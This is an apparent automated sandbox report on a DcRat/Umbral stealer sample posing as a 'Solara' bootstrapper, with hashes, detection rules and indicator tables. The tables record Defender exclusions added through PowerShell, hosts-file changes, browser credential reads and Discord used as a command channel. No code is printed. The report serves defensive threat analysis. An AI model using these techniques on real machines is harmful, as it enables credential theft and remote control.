dcrat | 862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06

Analysis

max time kernel
90s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
28-06-2024 04:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe
Size

3.3MB
MD5

931767ee5322f0d8a22acb26374ef000
SHA1

eac51a96586271fde6ab226db3f3bdbfd1f72111
SHA256

862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06
SHA512

a790213cbe56e1cdc737af9c6a7176a277b04767eba3b9f99102c71d227d1b28696baaa4515f2844fd09e9b9ea6c106557aa24c6471b4f47d68715ce44e041d0
SSDEEP

49152:Zrd5oJBLERqgc7qzy0n1Ta80kXELz5oxr9WROea5CbEo51TMkqCZBO:hd5n3c0fnlb0kXyz59haG95lNqCZBO

Score

10^/10

dcrat umbral execution infostealer rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023421-18.dat	family_umbral
behavioral2/memory/1028-25-0x000002C375CB0000-0x000002C375CF0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x0007000000023422-30.dat	dcrat
behavioral2/files/0x0007000000023426-167.dat	dcrat
behavioral2/memory/628-169-0x0000000000480000-0x0000000000652000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 29 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
996	powershell.exe
3416	powershell.exe
4760	powershell.exe
4824	powershell.exe
2020	powershell.exe
4200	powershell.exe
4348	powershell.exe
3796	powershell.exe
3336	powershell.exe
2604	powershell.exe
2808	powershell.exe
1248	powershell.exe
452	powershell.exe
452	powershell.exe
2080	powershell.exe
4648	powershell.exe
208	powershell.exe
5092	powershell.exe
4868	powershell.exe
3184	powershell.exe
684	powershell.exe
2460	powershell.exe
4200	powershell.exe
4256	powershell.exe
2464	powershell.exe
3416	powershell.exe
4188	powershell.exe
2112	powershell.exe
5668	powershell.exe

Drops file in Drivers directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dIIhost.exe

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SolaraB.exe

Executes dropped EXE 64 IoCs

pid	Process
3440	SolaraBootstrapper.exe
1028	dIIhost.exe
2072	SolaraB.exe
4612	SolaraBootstrapper.exe
4900	dIIhost.exe
4596	SolaraB.exe
3960	SolaraBootstrapper.exe
1480	dIIhost.exe
2464	SolaraB.exe
1388	SolaraBootstrapper.exe
3212	dIIhost.exe
4900	SolaraB.exe
628	UnZiper.exe
3928	UnZiper.exe
1320	SolaraBootstrapper.exe
4564	dIIhost.exe
5060	SolaraB.exe
4336	UnZiper.exe
2972	SolaraBootstrapper.exe
2312	dIIhost.exe
1388	SolaraB.exe
1868	UnZiper.exe
1204	SolaraBootstrapper.exe
4944	dIIhost.exe
4824	SolaraB.exe
3424	UnZiper.exe
4804	SolaraBootstrapper.exe
2196	dIIhost.exe
4576	SolaraB.exe
4944	UnZiper.exe
1388	SolaraBootstrapper.exe
1612	dIIhost.exe
3336	SolaraB.exe
2716	UnZiper.exe
1744	SolaraBootstrapper.exe
4824	dIIhost.exe
4632	SolaraB.exe
3840	UnZiper.exe
736	SolaraBootstrapper.exe
1540	dIIhost.exe
4876	SolaraB.exe
4924	UnZiper.exe
4200	SolaraBootstrapper.exe
2656	dIIhost.exe
1596	SolaraB.exe
452	UnZiper.exe
2412	SolaraBootstrapper.exe
4912	dIIhost.exe
3636	SolaraB.exe
4084	UnZiper.exe
1768	SolaraBootstrapper.exe
1888	dIIhost.exe
2464	SolaraB.exe
2772	UnZiper.exe
384	SolaraBootstrapper.exe
4636	dIIhost.exe
4200	SolaraB.exe
3920	UnZiper.exe
368	SolaraBootstrapper.exe
2364	dIIhost.exe
3856	SolaraB.exe
2604	UnZiper.exe
1516	SolaraBootstrapper.exe
3840	dIIhost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 56 IoCs

Web Service

T1102

flow	ioc
41	discord.com
114	discord.com
124	discord.com
153	discord.com
67	discord.com
139	discord.com
160	discord.com
214	discord.com
33	discord.com
34	discord.com
78	discord.com
98	discord.com
215	discord.com
242	discord.com
115	discord.com
166	discord.com
229	discord.com
131	discord.com
179	discord.com
186	discord.com
91	discord.com
207	discord.com
20	discord.com
50	discord.com
106	discord.com
138	discord.com
77	discord.com
193	discord.com
228	discord.com
19	discord.com
146	discord.com
201	discord.com
159	discord.com
68	discord.com
125	discord.com
132	discord.com
152	discord.com
167	discord.com
200	discord.com
208	discord.com
221	discord.com
42	discord.com
107	discord.com
180	discord.com
187	discord.com
49	discord.com
99	discord.com
194	discord.com
235	discord.com
236	discord.com
145	discord.com
84	discord.com
85	discord.com
92	discord.com
222	discord.com
243	discord.com

Looks up external IP address via web service 29 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
103	ip-api.com
190	ip-api.com
204	ip-api.com
211	ip-api.com
246	ip-api.com
81	ip-api.com
95	ip-api.com
163	ip-api.com
232	ip-api.com
239	ip-api.com
15	ip-api.com
110	ip-api.com
118	ip-api.com
156	ip-api.com
28	ip-api.com
128	ip-api.com
135	ip-api.com
53	ip-api.com
88	ip-api.com
170	ip-api.com
149	ip-api.com
183	ip-api.com
218	ip-api.com
197	ip-api.com
225	ip-api.com
38	ip-api.com
46	ip-api.com
73	ip-api.com
142	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 28 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4744	wmic.exe
4068	wmic.exe
4664	wmic.exe
5972	wmic.exe
4548	wmic.exe
1016	wmic.exe
220	wmic.exe
788	wmic.exe
4728	wmic.exe
1788	wmic.exe
224	wmic.exe
3884	wmic.exe
1600	wmic.exe
1616	wmic.exe
4060	wmic.exe
568	wmic.exe
5004	wmic.exe
2776	wmic.exe
4868	wmic.exe
5052	wmic.exe
3372	wmic.exe
788	wmic.exe
1080	wmic.exe
3408	wmic.exe
2716	wmic.exe
4068	wmic.exe
3192	wmic.exe
2228	wmic.exe

Modifies registry class 40 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	SolaraB.exe

Runs ping.exe 1 TTPs 28 IoCs

Remote System Discovery

T1018

pid	Process
2168	PING.EXE
1468	PING.EXE
3232	PING.EXE
3232	PING.EXE
4448	PING.EXE
4256	PING.EXE
2796	PING.EXE
1564	PING.EXE
2116	PING.EXE
4948	PING.EXE
2404	PING.EXE
4940	PING.EXE
840	PING.EXE
2120	PING.EXE
4504	PING.EXE
4504	PING.EXE
1620	PING.EXE
4784	PING.EXE
2740	PING.EXE
2880	PING.EXE
332	PING.EXE
4392	PING.EXE
1124	PING.EXE
996	PING.EXE
4332	PING.EXE
348	PING.EXE
1836	PING.EXE
3036	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1028	dIIhost.exe
684	powershell.exe
684	powershell.exe
4488	powershell.exe
4488	powershell.exe
1604	powershell.exe
1604	powershell.exe
3996	powershell.exe
3996	powershell.exe
3636	powershell.exe
3636	powershell.exe
4564	dIIhost.exe
2464	powershell.exe
2464	powershell.exe
2464	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
2704	powershell.exe
2704	powershell.exe
2704	powershell.exe
1724	powershell.exe
1724	powershell.exe
1724	powershell.exe
2604	powershell.exe
2604	powershell.exe
2604	powershell.exe
2196	dIIhost.exe
2196	dIIhost.exe
2808	powershell.exe
2808	powershell.exe
2808	powershell.exe
1924	powershell.exe
1924	powershell.exe
1924	powershell.exe
2224	powershell.exe
2224	powershell.exe
2224	powershell.exe
568	powershell.exe
568	powershell.exe
568	powershell.exe
3924	powershell.exe
3924	powershell.exe
3924	powershell.exe
1540	dIIhost.exe
1540	dIIhost.exe
4648	powershell.exe
4648	powershell.exe
4648	powershell.exe
568	powershell.exe
568	powershell.exe
568	powershell.exe
1868	powershell.exe
1868	powershell.exe
1868	powershell.exe
1552	powershell.exe
1552	powershell.exe
1552	powershell.exe
1720	powershell.exe
1720	powershell.exe
1720	powershell.exe
4912	dIIhost.exe
4912	dIIhost.exe
996	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1028	dIIhost.exe
Token: SeIncreaseQuotaPrivilege	2168	wmic.exe
Token: SeSecurityPrivilege	2168	wmic.exe
Token: SeTakeOwnershipPrivilege	2168	wmic.exe
Token: SeLoadDriverPrivilege	2168	wmic.exe
Token: SeSystemProfilePrivilege	2168	wmic.exe
Token: SeSystemtimePrivilege	2168	wmic.exe
Token: SeProfSingleProcessPrivilege	2168	wmic.exe
Token: SeIncBasePriorityPrivilege	2168	wmic.exe
Token: SeCreatePagefilePrivilege	2168	wmic.exe
Token: SeBackupPrivilege	2168	wmic.exe
Token: SeRestorePrivilege	2168	wmic.exe
Token: SeShutdownPrivilege	2168	wmic.exe
Token: SeDebugPrivilege	2168	wmic.exe
Token: SeSystemEnvironmentPrivilege	2168	wmic.exe
Token: SeRemoteShutdownPrivilege	2168	wmic.exe
Token: SeUndockPrivilege	2168	wmic.exe
Token: SeManageVolumePrivilege	2168	wmic.exe
Token: 33	2168	wmic.exe
Token: 34	2168	wmic.exe
Token: 35	2168	wmic.exe
Token: 36	2168	wmic.exe
Token: SeIncreaseQuotaPrivilege	2168	wmic.exe
Token: SeSecurityPrivilege	2168	wmic.exe
Token: SeTakeOwnershipPrivilege	2168	wmic.exe
Token: SeLoadDriverPrivilege	2168	wmic.exe
Token: SeSystemProfilePrivilege	2168	wmic.exe
Token: SeSystemtimePrivilege	2168	wmic.exe
Token: SeProfSingleProcessPrivilege	2168	wmic.exe
Token: SeIncBasePriorityPrivilege	2168	wmic.exe
Token: SeCreatePagefilePrivilege	2168	wmic.exe
Token: SeBackupPrivilege	2168	wmic.exe
Token: SeRestorePrivilege	2168	wmic.exe
Token: SeShutdownPrivilege	2168	wmic.exe
Token: SeDebugPrivilege	2168	wmic.exe
Token: SeSystemEnvironmentPrivilege	2168	wmic.exe
Token: SeRemoteShutdownPrivilege	2168	wmic.exe
Token: SeUndockPrivilege	2168	wmic.exe
Token: SeManageVolumePrivilege	2168	wmic.exe
Token: 33	2168	wmic.exe
Token: 34	2168	wmic.exe
Token: 35	2168	wmic.exe
Token: 36	2168	wmic.exe
Token: SeDebugPrivilege	684	powershell.exe
Token: SeDebugPrivilege	4488	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeIncreaseQuotaPrivilege	4468	wmic.exe
Token: SeSecurityPrivilege	4468	wmic.exe
Token: SeTakeOwnershipPrivilege	4468	wmic.exe
Token: SeLoadDriverPrivilege	4468	wmic.exe
Token: SeSystemProfilePrivilege	4468	wmic.exe
Token: SeSystemtimePrivilege	4468	wmic.exe
Token: SeProfSingleProcessPrivilege	4468	wmic.exe
Token: SeIncBasePriorityPrivilege	4468	wmic.exe
Token: SeCreatePagefilePrivilege	4468	wmic.exe
Token: SeBackupPrivilege	4468	wmic.exe
Token: SeRestorePrivilege	4468	wmic.exe
Token: SeShutdownPrivilege	4468	wmic.exe
Token: SeDebugPrivilege	4468	wmic.exe
Token: SeSystemEnvironmentPrivilege	4468	wmic.exe
Token: SeRemoteShutdownPrivilege	4468	wmic.exe
Token: SeUndockPrivilege	4468	wmic.exe
Token: SeManageVolumePrivilege	4468	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3552 wrote to memory of 3440	3552	862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe	81
PID 3552 wrote to memory of 3440	3552	862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe	81
PID 3552 wrote to memory of 1028	3552	862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe	82
PID 3552 wrote to memory of 1028	3552	862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe	82
PID 3552 wrote to memory of 2072	3552	862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe	83
PID 3552 wrote to memory of 2072	3552	862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe	83
PID 3552 wrote to memory of 2072	3552	862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe	83
PID 1028 wrote to memory of 2168	1028	dIIhost.exe	86
PID 1028 wrote to memory of 2168	1028	dIIhost.exe	86
PID 2072 wrote to memory of 1200	2072	SolaraB.exe	90
PID 2072 wrote to memory of 1200	2072	SolaraB.exe	90
PID 2072 wrote to memory of 1200	2072	SolaraB.exe	90
PID 1028 wrote to memory of 5072	1028	dIIhost.exe	91
PID 1028 wrote to memory of 5072	1028	dIIhost.exe	91
PID 1028 wrote to memory of 684	1028	dIIhost.exe	93
PID 1028 wrote to memory of 684	1028	dIIhost.exe	93
PID 3440 wrote to memory of 4612	3440	SolaraBootstrapper.exe	95
PID 3440 wrote to memory of 4612	3440	SolaraBootstrapper.exe	95
PID 3440 wrote to memory of 4900	3440	SolaraBootstrapper.exe	96
PID 3440 wrote to memory of 4900	3440	SolaraBootstrapper.exe	96
PID 3440 wrote to memory of 4596	3440	SolaraBootstrapper.exe	97
PID 3440 wrote to memory of 4596	3440	SolaraBootstrapper.exe	97
PID 3440 wrote to memory of 4596	3440	SolaraBootstrapper.exe	97
PID 1028 wrote to memory of 4488	1028	dIIhost.exe	98
PID 1028 wrote to memory of 4488	1028	dIIhost.exe	98
PID 4596 wrote to memory of 3760	4596	SolaraB.exe	100
PID 4596 wrote to memory of 3760	4596	SolaraB.exe	100
PID 4596 wrote to memory of 3760	4596	SolaraB.exe	100
PID 1028 wrote to memory of 1604	1028	dIIhost.exe	101
PID 1028 wrote to memory of 1604	1028	dIIhost.exe	101
PID 1028 wrote to memory of 3996	1028	dIIhost.exe	103
PID 1028 wrote to memory of 3996	1028	dIIhost.exe	103
